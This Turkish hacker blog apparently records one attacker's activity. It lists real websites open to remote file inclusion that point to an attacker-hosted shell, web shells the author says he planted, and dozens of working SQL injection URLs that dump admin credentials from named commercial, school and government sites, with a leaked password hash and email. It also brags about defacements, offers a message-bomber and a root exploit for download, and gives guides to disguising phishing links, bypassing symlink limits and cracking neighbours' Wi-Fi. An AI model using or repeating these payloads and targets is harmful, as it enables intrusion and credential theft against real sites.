Hack Haber hayatım başladı..

 S.a
evt arkadaşlar dedigim gibi hacktebugun.com tarafsız hack haber sitesinde    30.12.2009  yani bugun hack haber hayatımdaki ilk adımı attım.. Bütün dost bildiklerimden ve beni dost bilenlerden desteklerini bekliyorum..

HackHaber İletisim : medya@hacktebugun.com              

rfı açıklı siteler

http://www.nadirfotografevi.net/templates/javanya/index.php
http://www.inandanismanlik.com/inan.php?id=http://webkanki.com/ege.txt?
http://www.mersinrotaract.org/rotaract.php?r=http://webkanki.com/ege.txt?
http://www.fesam.org/sur_makale.php?url=http://webkanki.com/ege.txt?
http://www.dogaldagitim.com.tr/tmp/ege.php
http://www.aralikedebiyat.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/linux/ege.php
http://www.turkburosen.org.tr//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://webkanki.com/ege.txt?
http://www.confiteriacentral.cl/index.php?link=http://webkanki.com/ege.txt? 2.6.18 2008
http://www.techplus.ie/spaw/spaw_control.class.php?spaw_root=http://webkanki.com/ege.txt?
http://www.birminghamsciencecity.com/about/people/working.php?incFile=http://webkanki.com/ege.txt?
http://gioia-m.jp//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://webkanki.com/ege.txt?

HackteBugun İle yaptıgım guzel roportaj..

 habere aşadaki linkten ulaşabilirsiniz..
http://www.hacktebugun.com/haberdetay/1212-ByEge-İle-Roportaj.html

5 site hacked

http://dcl.cr/
http://emarketing.cr/
http://infusion.pro/   -----> Pro.. xD
http://keen.cr/
http://keenserver.com/

http://sanalturkler.org/defacements/?id=19851
http://sanalturkler.org/defacements/?id=19850
http://sanalturkler.org/defacements/?id=19849
http://sanalturkler.org/defacements/?id=19848
http://sanalturkler.org/defacements/?id=19847

Digital Factory Kosta Rika Hacked..

site :   http://digitalfactory.cr/
zone : http://sanalturkler.org/defacements/?id=19836
zone : http://mirrorturk.com/deface_mirror/?id=13184



site : http://www.digitalfactory.co.cr/
zone : http://sanalturkler.org/defacements/?id=19831
zone : http://mirrorturk.com/deface_mirror/?id=13183

maksat eglence..

WordPress Kosta Rika Hacked.!

site : http://wordpress.cr/

zone : http://mirrorturk.com/deface_mirror/?id=13182
zone : http://sanalturkler.org/defacements/?id=19828

Net Send Bomber

Net Send Bomber
Platform:	Windows (Tümü)
Dil:	Delphi
Boyut:	374 kb
Yazıldığı yıl:	2005
Eklendiği tarih:	07.10.2009
Açıklama:
Program yerel ağda herhangi bir pc'ye belirlediğiniz aralıklarda, belirlediğiniz sayıda yada sınırsız sayıda istediğiniz mesajı atarak karşı tarafın bilgisayarının mesaj yağmuru altında kalmasını, PC'sinin donmasını, yavaşlamasını sağlıyor. Tek yapmanız gereken karşı PC'nin adını veya ağdaki ipsini girmek. Program messenger hizmeti üstünde çalıştığı için o kişiye birşey göndermenize gerek yoktur.   İndirme Linki : http://alpgulec.com/Net Send Bomber 1.0.zip

Otomatik Toplu Mesaj Gönderici (MgsPlus!)

Platform:	Msn Plus Eklentisi
Dil:	Javascript & Apiler
Boyut:	3 kb
Yazıldığı yıl:	2007
Eklendiği tarih:	06.10.2009
Açıklama:
Listenizdeki tüm online kişilere mesajlarınızı toplu olarak iletmenize yarayan Msn Plus scriptim.İstenilen zaman aralığında, listenizde online olan kişilerden seçtiklerinize toplu olarak mesaj göndermenizi sağlar. Kişi seçme özelliğinin bulunması mesaj göndermek istemediğiniz kişileri gönderim listesinden çıkartmanızı sağlar.   İndirme Linki http://alpgulec.com/OtomatikTopluMesajScripti.rar

dosya birleştirme programı, dosya birleştirme, dosya gömme, dosya saklama

Bu program herhangi bir dosyayı bir

dosyanın içine gömmeye yarıyor. Gizli saklı dosyalarınız varsa bunu ortalıkta tutmak yerine bir dosyanın içine gömersiniz ve ihtiyacınız olduğunda çıkartırsınız. Örneğin bir belgenin bir oyun dosyasının içinde saklanması. Oyuna dosya eklediğiniz zaman oyun çalışır halde olacak sadece boyutu büyüyecek. Dosyayı eklediğiniz zaman ana dosya sorunsuzca çalışmaktadır. Sadece içindeki dosyadan dolayı boyutu büyükmektedir. İçine gömdüğünüz dosyayı çıkarttığınızda ana dosyanın boyutu tekrar eski haline gelecek ve sorunsuzca çalışmaya devam edecektir. Gizli dosyanızın asla erişilemeyecek bir yerde olması kendinizi güvende hissetmenizi sağlayacaktır. Programın anlatımı rar dosyasının içinde mevcut. Programı kullanmadan önce yardıma gözatmanızı tavsiye ederim.

indirme linki.
http://www.alpgulec.com/dosyagomme.rar

Short Url, URL Kisaltma Mantigi İle Hacking Taktikleri Resimli

Merhaba arkadaslar ne zamandır bu dokumanı yazmak ıcın zaman arıyordum sizlere simdi url kısaltma mantıgı ile karsı tarafa istedigimizi Kamufle ederek yedirmeyi anlatıcam.Ben suan bunu bir rapid pisherda kullanıyorum rmxle benım elımden gecmis pisher uzerınde.

Kullanabiliceginiz Alanlar

XSS
XSRF
CSRF
Html Trojan
Pishing

Siteler (Google'de Cok fazla var Bulabilirsiniz)

www.lix.in (sayfayı kendi uzerinden acar)
www.kisalink.com
www.linkslash.com
www.kisaca.net (sayfayı kendi uzerinden acar)

NOT : Google uzerinden url kısaltma bulmak icin Short Url veya url kısalt yazarak daha fazla bulabılırsınız.

Simdi basit bir xss acıgında resimli uygulama yapalım..( Ben lix.in uzerinden gostericem)

Mynet Xss Yedirme Resim-1

Resim2 (Link kamufle ediliyor)

 

Resim-3 (Link Hazır)

  

Resim-4 (Kurban XSS linkini farketmeden yiyor)

 

Bu Mantıgı Ustte yazdıgım tum alanlarda kullanabılırsınız mantıgı ıslevı lınklerınızı kamufle etmek free hostlardan bile kullansanız kurban bunu anlamayacaktır.Bu yontemle en guzel html logger ve Csrf yedirilir.Ben sadece Calısma mantıgını ve calıstıgını gostermek amaclı resımler ekledım..

NOT : Resimlerdeki notları okuyunuz

TurkXakep | Attackerz.Com | Attack3rz Crew

Symlink Permission @ Priv8

Merhaba arkadaşlar,

Herhangi bir servera girdiniz ve safe mode off ancak disable fonksiyonlarda symlink engellenmiş ve siz symlink ile dosya çağırıp browserde girdiğinizde " You don't have permission to access khi symlink " hatası alıyorsanız,aşağıda paylaştığım .htaccess kodunu siteye .htaccess olarak yüklemeniz yeterli olacaktır


Kod..

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

kaynak :  http://h4ckz.net/act/index.php?topic=182.0 

Backtrack Kullanımı ( Wireless şifre Kırma ), wireless hack

Okumaya Baslamadan Önce;

bu sitemin çalisabilmesi için Linux tabanli Kernel'i kullanmaniz gerekmekte. Ayrica çok genis bir WordList e sahip olmaniz gerekiyor ki bu da biraz zor olacagi anlamina gelir. Çünkü kaliteli ve çok genis bir WordList GB lar boyutunda. Diyelim ki böyle bir wordlist yaptiniz sorun bitti mi peki? Malesef hayir. Çünkü bu kadar büyük bir wordlist ile çalisirken program hata verebiliyor. Bazen donma olaylari da mevcut. Ama karsimizdakinin acemi oldugunu ve öle karmasik sifreleme kullanmaycagini düsünürsek bu is ise yarayabilir...

backtrack download:
http://ftp://mirror.switch.ch/mirror/backtrack/

wep crack video :
http://milw0rm.com/video/?start=60#

backtrack açilis sifreleri

giris(id) = root
sifre = toor

daha sonra

komut satirina sunu yazin

startx

ve backtrack masaüstü açilacaktir

WEB SIFRESI KIRMA

Dinleme Modu


Kablosuz aglarla ilgili yapilacak her islem "dinleme" ile baslar. Yani havada dolasan kablosuz sinyalleri yakalamak.. Eger kullandiginiz kablosuz ag cihazi (PCI, USB ya da PCMCIA olabilir) dinleme moduna destek vermiyorsa hiç birsey yapamazsiniz.

Ayrica kablosuz ag cihazinin sürücülerinin back-track in içerisinde yüklü olmasi gerekir. Back track cd sini takip, bilgisayarinizi yeniden baslattiktan sonra, ilk is olarak back track in kablosuz ag birimlerinizi taniyip tanimadigini kontrol etmelisiniz. Bunun için airmon script aracini kullanacagiz. (Bu araca ulasmak için KDE menüsünden Wireless Tools > Cracking > Air Crack > Airmon yolunu izlemelisiniz

Resimde gördügünüz gibi bizim kullandigimiz makinede eth0 arabirimini kullanan centrino b/g model bir kablosuz ag karti bulunuyor. Bu kart ipw2200 sürücüsünü kullaniyor. Buradaki eth0 arabirimi bizim için özellikle önemli. Çünkü her asamada bu arabirimini kullanacagiz. Sizin cihaziniz eth1, wlan0 gibi bir baska arabirim kullaniyor olabilir. Bizim yazimizda eth0 olarak geçen ifadelerin yerine siz kendi arabiriminizi yazmalisiniz. Eger ki herhangi bir kablosuz ag sürücüsü bulunamazsa sisteminiz kablosuz aglara baglanamayacagindan, yazimizdaki uygulamalari gerçeklestiremezsiniz. Ancak bu noktada da çaresiz degilsiniz. internette küçük bir aramayla kullandiginiz ag aracina uygun Linux sürücülerini bulabilirsiniz. Ancak kullandiginiz araç broadcom chipset’i tasiyorsa isiniz oldukça zor. Öncelikle back track in kullandigi Linux çekirdegini güncelleyip, broadcom destegini kernel modülü olarak yüklemeniz gerekiyor. Bu islemi back track i sabit diskinize kurmadan yapamayacaginizi da hemen belirtelim. Bunun disinda back track in temeli ola Slackware ve Slax Linux dagitimlarinin paket depolarini gezerek derlenmis driver, kernel ve diger yazilimlari kolayca bulabilirsiniz. (back track canli dagitimina yazilim ya da sürücü kurabilirsiniz. Bu islem için sistemi kurmaniza gerek yoktur.) Bunun için öncelikle www.slax.org adresindeki ’modules’ sayfasina bakmanizi öneririz. Artik her seyimiz hazir. Biz, blackwhite’nin kablosuz internet agini kirmak için haziriz. Yazinin basinda da bahsetmistik. Ev ve ofislerde 3 çesit güvenlik yöntemi kullanilir. WPA sifreleme, WEP sifreleme ve MAC adres korumasi. Biz denemelerimize kirilmasi en basit olandan basladik; MAC adres korumasi..

MAC Adres Korumasini Asmak


Windows’ta kablosuz aglari arattiginizda karsiniza çikan bazi aglar "güvensiz" olarak gözükür ama aga baglanmak istediginizde bir türlü basarili olamazsiniz. Çünkü router görevi gören modem sadece, daha önce tanimlanmis olan MAC adreslere sahip cihazlara izin verir. Bunun disinda kalan "yabanci" cihazlarin ver akisini engeller. Sizin cihaziniz da izinli bir MAC adrese sahip olmadigindan sifresiz aga giris yaparsiniz ama hiç bir veri akisina katilamazsiniz. Bu durumu çözmek için çok basit bir yöntem var. Izinli olan MAC adreslerden birini ögrenip, bu adresi klonlamak. Yani bilgisayarinizin MAC adresini degistirmek... Bunun için öncelikle izinli olan bir MAC adres bulmalisiniz. Bunu yapmak hiç de düsündügünüz kadar zor degil.

Hedef Erisim Noktasini ve Kanali Belirleme

Klonlayacagimiz MAC adresini belirlemek için ilk olarak Kismet isimli programi kullanacagiz. back trackin "KDE" menüsünden "BackTrack > Wireless Tools > Analyzer" yolunu izleyerek Kismet isimli programi çalistirin. Kismet aslinda menzilinizdeki tüm kablosuz aglar üzerinden geçen bilgileri yakalayip kaydeden bir program. Bu yüzden Kismet’i ilk açtiginizda, program size yakaladigi bilgileri nereye kaydedecegini soracak. Masaüstü ya da herhangi baska bir yeri seçip devam tusuna basabilirsiniz. Ardindan bir siren sesiyle Kismet’in arabirimiyle karsilacaksiniz. Bizim yaptigimiz denemede ofisimizin yakininda birçok ag çikti. Bizim hedefimiz ise "blackwhite" isimli modeme girebilmekti

Resim 1 de gördügünüz gibi blackwhite isimli kablosuz ag 5. kanaldan yayin yapiyor. istedigimiz ilk bilgiyi almis olduk. Kismet’i kapatip 5. kanali daha yakindan izlemeye çalisalim

izinli bir MAC Adresi Bulmak

5. kanali daha yakindan takip etmek için Airodump isimli uygulamayi kullaniyoruz. Bunun için "KDE" menüsünden "BackTrack > Wireless Tools > Cracking > Aircrack" yolundan Airodump uygulamasini çalistiriyoruz. Açilan konsolda asagidaki komutu yazmamiz gerekiyor.

airodump-ng --channel 5 --write dosya eth0

Bu komutta yapmak istedigimiz islem su: 5. kanaldaki yayinlari eth0 arabirimindeki kablosuz ag cihazi ile yakalayip yakalanan verileri ’dosya’ ismiyle kaydettiriyoruz. Burada lütfen yazdigimiz komuttaki parametrelere dikkat edin. Ayni denemeyi siz yapacaksiniz, kullanacaginiz kanal ve arabirim (eth0) farkli olacaktir. BIzim test sistemimizde eth0 kablosuz ag karti, eth1 ise ethernet kartina denk geliyor. Siz sisteminizde wlan0 wlan1 isimler kullanmak zorunda kalabilirsiniz. simdi dinlemeye basliyoruz. Birkaç saniye beklediginizde aga bagli cihazlar tek tek dökülmeye baslayacak

Resim 2 de ilk üç cihaz dogrudan kablosuz modeme baglanmis durumda. Diger dördüncü bilgisayarin ise muhtemelen kablosuz ag adaptörü açik ama herhangi bir modeme bagli degil. Büyük ihtimalle listedeki ilk 3 MAC adresinin modemden izni var. Bu yüzden bu MAC adresleri klonlayarak bu modeme erisim saglayabilecegimizi düsünüyoruz. simdi cd yi çikartip yeniden Windows’a dönme zamani geldi. Windows’ta MAC adresimizi degistirmeyi deneyecegiz. Bazi kablosuz ag kartlari MAC adresinizi dogrudan degistirmenize izin veriyor. Eger siz de bu kartlardan birini kullaniyorsaniz isiniz çok kolay. Masaüstündeki "Ag Baglantilarim" a sag tiklayip "Özellikler" menüsünü seçin. "Yapilandir" butonuna basin ve "Gelismis" sekmesine geçin. Listede ’Mac Adresi’ gibi bir seçenek olmasi gerekiyor. Buradan Deger kismina not ettigimiz MAC adreslerinden birini giriyoruz. OK tusuna bastiginizda artik MAC adresinizin degismis olmasi lazim. Artik MAC adres filtreleme metoduyla güvenlik saglamaya çalisan blackwhite agina baglanabilirsiniz. Eger sizin ag
kartiniz MAC adresini degistirmenize izin vermiyorsa sorun degil. MAC adresini degistiren birçok program bulabilirsiniz. Ama bu programlar deneme sürümlerinde MAC adresini rasgele degistirir.
Yani sizin istediginiz MAC adresini girmenize izin vermez. Bu yüzden eger parasini verip programi satin almayacaksaniz, ayni islemi kayit defteri üzerinden de yapabilirsiniz

Kayit Defterinden MAC Adresini Degistirmek

Bu isleme baslamadan önce kayit defterinizin yedegini almayi unutmayin. Eger yanlis bir islem yaparsaniz sisteminiz zarar görebilir. MAC adresini degistirmek için önce "Baslat" menüsünden "Çalistir" a gelin ve "cmd" yazarak komut satirina geçin. Kablosuz ag adaptörünüz takili ve çalisir durumdayda su komutu yazin: net config rdr



simdi resim 3 teki gibi bir ekran görüyor olmalisiniz. Bu ekranda gördügünüz ayraçlar içindeki uzunca bölüm GUID (Globally Unique ID) numarasidir. Hemen onun yanindaki ise MAC adresiniz.. GUID numarasini bir kenara not edin. "Baslat" menüsünden "Çalistir" a gelip regedit yazin. HKEY_LOCAL_MACHINE\\\\\\\\\\\\\\\\SYST EM\\\\\\\\\\\\\\\\CurrentControlSet\\\\\\ \\\\\\\\\\Control\\\\\\\\\\\\\\\\Class yolunu izleyin ve bu yolun sonunda GUID numaranizi bulun. Alt alta 0000, 0001 gibi klasörlerle karsilasacaksiniz. Bu klasörlere tiklayarak AdapterModel kisminda Wireless adaptörünüzü bulmaya çalisin. Dogru adaptörü buldugunuzda alt satirlardan NetworkAdress kismi karsiniza çikacaktir. Burada yapmaniz gereken, MAC adresinizi istediginiz baska bir adresle degistirmek. Aslinda MAC adres korumali bir aga girmek için ihtiyaciniz olan bilgileri Windows altinda çalisan NetStumbler isimli programla elde edebilirsiniz. Ancak biz WEP ve WPA sifrelerini de kirarken back track i kullanacagimiz için konuyu dagitmamak adina NetStumbler i ise karistirmadik.

WEP SIFRELERINI KIRMAK

WEP sifreleri 10 hanelidir ve içinde sadece A’dan F’ye kadar harfler ve 0 dan 9 a kadar rakamlar bulunur. Bu yüzden de kombinasyon sayisi sinirlidir. Yani kirilmasi daha kolaydir. Günümüzde bu sifreleme yetersiz kaldigindan daha güvenli olan WPA sifreleme yöntemi gelistirilmistir. WEP in hala kullaniliyor olmasinin nedeni ise kismen geriye dönük uyumluluk, kismen kablosuz dagitim sistemini desteklemesidir. WEP yönteminin nasil kirildigina geçmeden önce basit bir sekilde WEP yönteminin nasil islediginden bahsedelim. WEP yönteminde kablosuz ag dagiticisi, modem ya da router kendine bir istek geldiginde rastgele 128 bitlik bir metin olusturup kablosuz baglantiyi yapacak cihaza (notebook, PDA vs) gönderir. Cihaz kendisindeki WEP sifresi ile bu gelen manasiz metni sifreler ve geri gönderir. Modem kendisine gelen sifreli metnin dogru sifrelenip sifrelenmedigine bakarak baglantiyi onaylar ya da reddeder. Bu arada baglantiyi dinleyen bir kisi rast gele seçilen 128 bitlik veriyi ve daha sonra bu verinin sifrelenmis halini yakalayabilir. Ama WEP ise sifrelenmis verilerin içerisinde intialization Cector (IV) denen datalar kullanilir. Bu IV datalari her pakette degisir. Yani modem üzerinde ne kadar trafik varsa o kadar çok IV vardir. IV datalari, paket içerisinde sifrelenmez çünkü bu datalar tekrar açilirken bu IV ler kullanilacaktir. IV’lerin amaci ayni metnin iki kez geçilmesi durumunda farkli sifrelenmis datalar olusmasini engellemektir. IV datalari 24 bit uzunlugundadir. Bu yüzden 64 bit WEP ise sifrelenmis bir data aslinda 40 bittir. Çünkü 24 bit IV’den olusmaktadir. 24 bit kisa bir dizi oldugundan trafik arttikça IV’ler tekrar girebilir. iste WEP’in kirilma fikrinin ana temasi da buradan ortaya çikiyor. Amaç tekrar eden IV’leri yakalamak. Tabii isin mantigi bu kadar kolay degil. Ama olayin pratikteki kullanimini anlatabilmemiz için simdlik bu kadari yeterli.

Hedefi Tespit Etmek


Simdi amacimiz blackwhite kablosuz agina davetsiz olarak misafir olarak girmek ve yüksek hizda internet baglantisina erisebilmek. Bunun için öncelikle blackwhite agi hakkinda bilgi alacagiz. Sonra bu agdaki sifreli paketlerden toplayabildigimiz kadar toplayacagiz ve son olarak da sifreyi kirmayi deneyecegiz. ilk olarak Kismet isimli programi çalistiriyoruz. Kismet açildiktan kisa bir süre sonra blackwhite agini görüyoruz

Linux Root(0d4y local root exploit) Videos !h

S.a arkadaşlar yine sizlere güzel bir video çektim videomuzda linux 0d4y local root exploit ile dahan önce root olunamayan kerneli rootlamış bulunmaktayım kernel versiyon = 2008 ama varsa rootlayacak biri vereyim rootlarsa delikanlı gibi helal olsun diyecem =)

Download : http://yurdumshop.com/0d4ylocalroot.zip

Selametle videoda kullandığım expler hiç bir güvenlik sitesinde mevcut değildir

~ ./Heart

SQL injection açıklı siteler

http://www.bote.yildiz.edu.tr/v2/index.php?option=com_mezun&task=edit&hidemainmenu=0&id=-99999 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from jos_users

http://stat.ogu.edu.tr/atalay/index.php?option=com_mezun&task=edit&hidemainmenu=1&id=-601 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12 from jos_users

http://www.circassiancommunity.com/webroot/cb-newsdetail.php?token=7eab9310c5fb03ed4149c55e3130449b&news_id=-17 UNION SELECT 1,2,admin_login,admin_password,admin_mail,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from cc_admins

http://belediyemdergisi.net/kategori.php?id=-8 UNION SELECT 1,kuladi,3,4,5,ksifre,7 from yonetim

http://www.medyabu.com/haber_detay.php?id=-1250 UNION SELECT 1,2,3,k_adi,sifre,6,7,8,9,10,11,12,13,14 from kullanicilar

http://www.gunisigigazetesi.net/cikti1.php?id=-1 UNION SELECT 1,2,3,4,kullanici_adi,sifre,7,8 from yoneticiler

http://www.psikoturk.net/kategori.php?iid=-16 UNION SELECT 1,login,password,4,5,6,7,8,9,10,11,12,13 from users

http://www.merhaba.info/haberler/devami.php?id=-10967 UNION SELECT 1,2,3,4,5,name,pwd,usr,9,10,11,12,13,14,15,16,17 from logon

http://www.altanplastik.com.tr/haber.php?id=-3 UNION SELECT 1,2,user,pass from users

http://www.cosarkomur.com.tr/duyuru.php?id=-1%20UNION%20SELECT%201,user,3,pass%20from%20users

http://genaygayrimenkul.com/?sayfa=ek_sayfa&id=-11 UNION SELECT 1,2,danisman_sifre,4,danisman_kullanici,6 from emlak_danisman

http://www.bigblue.com.tr/tr/main.php?page=basindan_detay&id=-1 UNION SELECT 1,username,3,4,5,password,7,8,9 from admin

http://www.hrantdink.org/tr/duyuru.php?id=-1 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables

http://www.rahimtarim.com/duyuru.php?id=-89 UNION SELECT 1,2,3,4,5,6,7,admin_password,9,10 from calendar_admin

http://egitimcemberi.com/haber_detay.php?id=-3 UNION SELECT 1,kuladi,3,sifsif,5 from siteuyeleri

http://www.istanbul.edu.tr/itf/ortopedi/yazdir.php?category=tarihce&category_name=Tarihçe&title_id=1&text_id=-1 UNION SELECT 1,2,3,password,email from users

http://www.sohbetagi.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.sohbette.in/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.ecesohbet.net/yazdir.php?id=-2598%20UNION%20SELECT%201,adminadi,3,adminsifre,5,6%20from%20admin

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,user,password))),5,6 from mysql.user--

http://www.eee.deu.edu.tr/print.php?sid=-305 UNION SELECT 1,2,3,unhex(hex(concat_ws(0x3a,name,pwd))),5,6 from nuke_authors--

http://www.joinvillecultural.sc.gov.br/noticia.php?cd_noticia=-975%20UNION%20SELECT%20nome,senha%20from%20usuario
http://www.camaradc.sc.gov.br/home/noticias.php?id=-169%20%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20admin

http://www.emsetur.se.gov.br/noticias.php?id=-414%20UNION%20SELECT%201,2,senha,login,5%20from%20acesso

http://wanning.hainan.gov.cn/v6/news/news.php?type=qiye_dt&id=-4714%20UNION%20SELECT%201,username,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%20c_user

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2015,1
http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20limit%2018,1

http://www.cmpa.mg.gov.br/noticias.php?id=-33%20UNION%20SELECT%201,usuario,3,senha,5,6,7,8,9%20from%20permissao MD5 KIRCAN

http://www.fundespi.pi.gov.br/noticias.php?id=-408%20UNION%20SELECT%201,2,3,4,table_name,6,7,8%20from%20information_schema.tables%20limit%2025,1

http://www.kimkimdir.gen.tr/yazdir.php?id=-22%20UNION%20SELECT%201,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20information_schema.tables%20limit%201,1
telekomun serveri
---------

http://azdavay.meb.gov.tr/haber/ayrinti.php?id=-1+union+select+0,concat(sifre,0x3a,kul_adi),2,3,4,5,6,7,8+from+uyeler

http://www.aliaga.pol.tr/sizdengelenlerayrinti.php?id=-152%20UNION%20SELECT%201,kullaniciadi,sifre%20from%20yonetimkullanicilar

http://www.lakatospal.hu/article_print.php?id=-145%20UNION%20SELECT%201,username,pw,4,5,6,7,8,9,10,11,12,13%20from%20users


http://www.emniyetemlak.com/ayrinti.php?id=-1 UNION SELECT 1,CONVERT(table_name USING latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables limit 17,1


http://salihlirehber.com/rehbercat.php?sayfa=1&category=-5 UNION SELECT 1,column_name,3,4,5,6,7,8,9,10,11 from information_schema.columns where table_name=CHAR(102, 105, 114, 109, 97, 108, 97, 114)

http://www.soma.web.tr/somailan/index.php?catid=-21 UNION SELECT 1,2

http://www.yozgatgazetesi.com/anketler.asp?islemID=101&ID=20+union+select+0+from+

http://www.vidinli.com/elemanilan/ayrinti.php?nopass=1&id=-962 UNION SELECT CONVERT(column_name USING latin1),2,3,4,5,6,7,8,9 from information_schema.columns where table_name=CHAR(101, 104, 99, 112, 119, 105, 107, 105, 95, 117, 115, 101, 114)

http://www.kimacaba.com/ayrinti.php?id=-2897%20UNION%20SELECT%201,column_name,3,4,5,6%20from%20information_schema.columns%20where%20table_name=%27biyografi%27%20limit%201,1

http://www.gal.k12.tr/oku.php?id=-182%20UNION%20SELECT%201,2,3,4,5,6,column_name,8,9,10,11%20from%20information_schema.columns%20where%20table_name=CHAR(97,%20100,%20109,%20105,%20110,%20100,%2097,%20116,%2097)

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user

http://www.kmarasdernekler.gov.tr/haberler.php?id=-26+union+select+0,pass,2,kid,4+from+user


http://www.sanmarenerji.com/TR/urun-detay.php?id=-12 UNION SELECT 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from information_schema.columns where table_name=CHAR(107, 117, 108, 108, 97, 110, 105, 99, 105) limit 6,1

http://www.opednews.com/populum/link.php?id=-83615%20UNION%20SELECT%201,2,3,4,table_name,6,7,8,9,10,11%20from%20information_schema.tables%20limit%2017,1

http://www.yuzeyislem-kumlama.com/haberler.php?id=-162 UNION SELECT 1,2,3,«ê from information_schema.tables limit 17,1

http://www.perdeciler.com/haberler.php?id=-162 UNION SELECT 1,2,3,4,5,6,eposta,pass,9,10,11,12,13 from members


http://clerideslegal.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://theatreantidote.com/link.php?id=-261%20UNION%20SELECT%20password,2,3%20from%20users

http://www.ogilvy.com.cy/link.php?id=-261%20UNION%20SELECT%201,username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20users

http://skadsillustration.com/prints.php?id=-8 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables limit 17,1

http://www.charlesritchie.com/prints.php?id=-346%20UNION%20SELECT%201,2,group_concat(%20column_name%20),4,5,6,7,8,9,10,11,12,13,14%20from%20information_schema.columns%20where%20table_name=CHAR(119,%20112,%2095,%20117,%20115,%20101,%20114,%20115)

http://www.darrencoldwell.com/prints.php?id=-20%20UNION%20SELECT%201,2,3,4,userPWD,6,userName%20from%20ob_users

http://www.artistanncoleman.com/prints.php?action=viewimage&id=-78 UNION SELECT 1,table_name,3,4,5,6,7,8,9,10,11,12 from information_schema.tables limit 17,1

http://www.casino-games-internet.com/ca/new.php?ID=-1741 UNION SELECT 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables limit 17,1

Shell Soktugum Hazır Siteler

http://www.issimo.net/portal2/tmp/ege.php 2.4.21 2009
http://www.saunot.com/tmp/ege.php

http://www.bigblue.com.tr/tr/reklamlar/ege.php
http://www.ysemarket.com/admin/backups/ege.php
http://www.ysemarket.com/moko.php?
http://www.dizaynet.net/patolojien/admin/fotoalbum/40.php
http://smf-tr.net/style.php
http://uzmankontor.net/deco57.php
http://www.ysemarket.com/admin/backups/ege.php
http://www.consumidorrs.com.br/rs2/main.php?p=http://webkanki.com/ege.txt?
http://www.cumhuriyetanadolulisesi.k12.tr/files/ege.php
http://www.mendereskaraer.com.tr/tmp/ege.php
http://www.tufanbeylilisesi.k12.tr/language/english.php
-----------------------------------------------------------------------------
http://festananet.com.br//pinte//forms/editor/img/ege.php
http://www.callcentercafe.com/uploads/Image/ege.php
http://www.intuitivesystems.com/assets/secimages/cmd.asp windows server..

http://www.kusadasi-oteller.com/bresim/conf.asp
http://eraresearch.com/inpressfiles/aspxshell.aspx
http://eraresearch.com/inpressfiles/cwshell.php
http://static.techsweek.com/init2.php
http://www.googlechrometr.com/xmlrp.php
http://www.necatibeyioo.k12.tr/ege.php?
http://www.farukcelik.com.tr/Upload/a203474ad9a581b438c66571fb0fbeb9.php
http://camaratga.mt.gov.br/admin/fotos/images/galeria/fotos_aereas/ege.php
http://www.reciclar-mt.com.br/admin/fotos/images/galeria/Educação Ambiental/ege.php
http://www.eksiogluimtas.com.tr/test/tmp/ege.php
http://tohumcular.com/ssss/wp-inc.php
http://www.mp3dinlermisin.com/wp-content/plugins/akismet/akismet.php
http://www.naturalhacker.com/wp-content/plugins/wp-e-commerce/ege.php

http://www.soyluanaokulu.com/html/tmp/ege.php http://www.soyluanaokulu.com/cgi-bin/cgiege.pl 2.6.18 2008
http://surucukursu.beyazpetrol.com/ege.php 2009
http://demo.uniwebtasarim.net/joomla/ja/ja_galena/tmp/ege.php
http://kiralikservers.com/tmp/ege.php
http://www.artspektif.com/d01/templates/beez/index.php 2008


Shellerin Üstüne İndex Basana Sanal Alem Bassın.!

simcrest.com SQL injection

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,Adauth),3,4,5,6,7,8 from simcrest_relay.relay_users

admin=7f0274a99146ae15eda88d85c3bf3cb9
http://www.simcrest.com/relay/ panel girişi..

http://www.simcrest.com/company_news.php?id=-96 UNION SELECT 1,concat(username,0x3D,password,0x3D,email),3,4,5,6,7,8 from users

redgell=b3ed48555a989b8ee27f613f7b5724dd=redgell@netsuccess.com

JOOMLA com_wcflm SQL injection

Acıgı Bulan : ByEge
Acık Türü : SQL İNJECTİON..
Site : h4ckz.com
Blog : byege.blogspot.com

google dork : inurl:com_wcflm

http:/localhost/index.php?option=com_wcflm&task=showList&flmlist_id=2&id= inj code..

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT password from jos_users--

http://wannadive.net/community/index.php?option=com_wcflm&task=showList&flmlist_id=2&id=-6306 UNION SELECT username from jos_users--

ByEge farkıyla Mp3 keyfi..

My Stuff

..

hehe

My Stuff

..

Blind SQL Injection

Blind SQL Injection

